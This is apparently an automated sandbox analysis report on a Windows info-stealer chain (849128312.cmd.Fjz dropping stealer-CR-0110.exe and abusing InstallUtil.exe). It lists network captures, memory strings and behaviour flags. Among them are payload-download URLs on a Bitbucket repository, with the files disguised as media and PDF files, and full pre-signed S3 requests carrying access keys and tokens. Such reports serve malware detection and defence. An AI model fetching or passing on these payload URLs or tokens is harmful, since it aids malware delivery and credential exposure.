Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/3e10a657-95f6-485a-b261-bddc3faeff6c/Hgjcrxfnz.mp3?response-content-disposition=attachment%3B%20filename%3D%22Hgjcrxfnz.mp3%22&AWSAccessKeyId=ASIA6KOSE3BNIEIP43DP&Signature=B5adOCQBGaXXStvtgXJrT%2FK011k%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIEKWj%2FjyJyUla4TUxj2qwDJeUpL8HAtTC9v2mxsTnr%2FtAiEAhX3oj6Xtqz7EgE9a8P5stTogLwKy2JdlhKi15IG8BZYqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDAFClDm68vTnYNr3GCqEApcGUDsrbHb6g7SkUBVzttzG23544pAb24muMUib8sEh4SMVlpf48ZeWA3DOIDSoeIwy3s0fXGwimVWr8HZ%2BpPpZYiQsLVffDmcpe3iR3yNr3FctMSfhkmhpEhGBNXpOvWCi7FYMWqvfdwS7BVP1xPP%2FOpati3cBm3AghhtQ7zP9x4%2BCqiyUIJaOB8vmh3SyDDWSoENBxPEjnNUACfIDTpfT1b6br9zUo5yBYoX9FkUwrtRyJ1RCpVvVyuSgU9xaAAm1VI4JWql9dfF9clDNIjFz2VYgEtCPpeYI%2BrltH6SGga5djb3oBTVPAYrlZuL3JyePjqvvSWm1dtyFE7cZ8jJj7ymZMOOurbgGOp0BhZnTNFhhGUWCfhkEEJcjLMbknDlN5Ia8oI6auJNYVbnSd3pVhcPRhn2XOfyMYfh2A81qE8FkFp67uzAr9GNOgBq4kI0URvRGnx9XyxxVe%2BByCrIrs8%2FQ%2Bj9Ns%2FZmTwD7UeyxBkd8v4%2FOWGcU5QTsYA7YPwyqUDjBCfybRPoT1d1rQhME0tQLVgfkpVt1UpQvNT1u4j1HfW6VohIpkw%3D%3D&Expires=1728798315 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b1e8acb6-ab61-4d48-9b47-4bc96cf59a21/Gqjmdstn.pdf?response-content-disposition=attachment%3B%20filename%3D%22Gqjmdstn.pdf%22&AWSAccessKeyId=ASIA6KOSE3BNNGREZMSF&Signature=v6ZxFBV4nL3oaCjj1qj3kdiRbnw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIQDZG%2Fk6XI2yYOu2V0Utzpd0eIOAE7HVeOOT%2FWQy4YMOKAIgMa6sJ4%2BiMtC5KTu8k7z6l7nKIuFwY7qAWn2LWVEiC2wqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDPdE3wsOdxXVeiwi1yqEAm8JejVR0obvQzZTIMsidRXOtJskS%2BVEsymGex9hcbQefXJ3reUU40QJbwQBW5C420ningDWxPVNlpaPZapZR2BlLS9QkAtHgp8K6OH2fSduvDuArtzJuO4RwxZpsRBQhQnUbKRZZOTm%2FnA7mwNmtBV4QKGS8K2N%2FDeGbCL4nttii2NJyWIaZW%2F6dPRJRH8kFkKFOArzlPZqtRwHoEdqC%2Bm%2BYvYgXZKkNghuOv8TTnyhCInS9%2F6ppGYX92rTA7w7ebYAFSuWKnrGM6h2jbcbA17nBzCTddSDLv%2FOdA2ZtLpRSRTyJ5G49HYxR%2BM4iDqPM03geohF3N5%2Fa%2F7LVcAmG321KfxvMOOurbgGOp0BbR31EsB77Otm7dUE8SkWQ%2B7sYnhv7MVJXvkV5NTPgD8asf8VCMmDQu6beM2ybLz1%2BRcdPp3aRxLf1fobnyS6rN3M1Hnp611qVue%2BaHF9MWbLo%2B8n1dhiUj1uO7cj2pd20P4L%2BbbBaB8U6mLTpM0lqtIEw3nCOx4tsw6h6N66tp7DLpQawPIuNOaueiybJ%2FL3RUP8D9SWRN7bxWB%2BGw%3D%3D&Expires=1728798315 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

Source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002831000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7F000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002876000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/3e10a657-95f6-
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/ad174d1e-b961-
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002876000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b1e8acb6-ab61-
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002831000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Gqjmdstn.pdf
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.00000000052EC000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000000.2143600636.0000000000642000.00000002.00000001.01000000.00000007.sdmp, stealer-CR-0110.exe.7.dr	String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Gqjmdstn.pdfv
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4530426029.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Hgjcrxfnz.mp3
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.171.137:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49709 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3DB58 NtResumeThread,	7_2_08E3DB58
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3C5D8 NtProtectVirtualMemory,	7_2_08E3C5D8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3DB51 NtResumeThread,	7_2_08E3DB51
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3C5A7 NtProtectVirtualMemory,	7_2_08E3C5A7
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6E0B8 NtResumeThread,	8_2_05D6E0B8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6CB80 NtProtectVirtualMemory,	8_2_05D6CB80
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6E0B3 NtResumeThread,	8_2_05D6E0B3
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6CB78 NtProtectVirtualMemory,	8_2_05D6CB78

Detected potential crypto function

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA760	7_2_04ABA760
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA3F8	7_2_04ABA3F8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABF158	7_2_04ABF158
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABE470	7_2_04ABE470
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA751	7_2_04ABA751
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA888	7_2_04ABA888
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA8F6	7_2_04ABA8F6
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA801	7_2_04ABA801
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA95E	7_2_04ABA95E
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABAA96	7_2_04ABAA96
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABAA56	7_2_04ABAA56
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABABB0	7_2_04ABABB0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D86687	7_2_06D86687
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D87AA4	7_2_06D87AA4
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D8A797	7_2_06D8A797
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D8A7A8	7_2_06D8A7A8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D80748	7_2_06D80748
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D84050	7_2_06D84050
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBEFD0	7_2_06DBEFD0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB1D58	7_2_06DB1D58
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBB68A	7_2_06DBB68A
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB22CF	7_2_06DB22CF
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBF2F7	7_2_06DBF2F7
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBB03A	7_2_06DBB03A
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBB038	7_2_06DBB038
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBBAD0	7_2_06DBBAD0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBBAC0	7_2_06DBBAC0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB0919	7_2_06DB0919
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB0928	7_2_06DB0928
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DFF278	7_2_06DFF278
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DF06E0	7_2_06DF06E0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_07451B50	7_2_07451B50
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E35200	7_2_08E35200
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E39480	7_2_08E39480
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E358A1	7_2_08E358A1
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E358B0	7_2_08E358B0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E351EF	7_2_08E351EF
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3B2F0	7_2_08E3B2F0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3947B	7_2_08E3947B
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E366A8	7_2_08E366A8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E366B8	7_2_08E366B8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E57EB8	7_2_08E57EB8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E5C008	7_2_08E5C008
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E5C018	7_2_08E5C018
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E57EA8	7_2_08E57EA8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_093BD8F0	7_2_093BD8F0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_093A001E	7_2_093A001E
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_093A0040	7_2_093A0040
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_07452448	7_2_07452448
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_07452374	7_2_07452374
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02642BD8	8_2_02642BD8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02642925	8_2_02642925
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02642980	8_2_02642980
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02641D76	8_2_02641D76
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02641D80	8_2_02641D80
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04954C30	8_2_04954C30
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04956E88	8_2_04956E88
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04958284	8_2_04958284
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495B3F0	8_2_0495B3F0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04954C20	8_2_04954C20
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495A1B0	8_2_0495A1B0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495A1A0	8_2_0495A1A0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495D1C0	8_2_0495D1C0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04951390	8_2_04951390
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04951380	8_2_04951380
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495B3E0	8_2_0495B3E0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D657A0	8_2_05D657A0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D646F0	8_2_05D646F0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6C8E0	8_2_05D6C8E0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D60040	8_2_05D60040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D69AA8	8_2_05D69AA8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D65790	8_2_05D65790
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D646EA	8_2_05D646EA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D65E10	8_2_05D65E10
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D65E20	8_2_05D65E20
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6C8D1	8_2_05D6C8D1
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D69A98	8_2_05D69A98
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D977B0	8_2_05D977B0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D90040	8_2_05D90040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D90DAA	8_2_05D90DAA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D90CB8	8_2_05D90CB8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D90CA8	8_2_05D90CA8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D977A0	8_2_05D977A0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D90007	8_2_05D90007
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D95343	8_2_05D95343
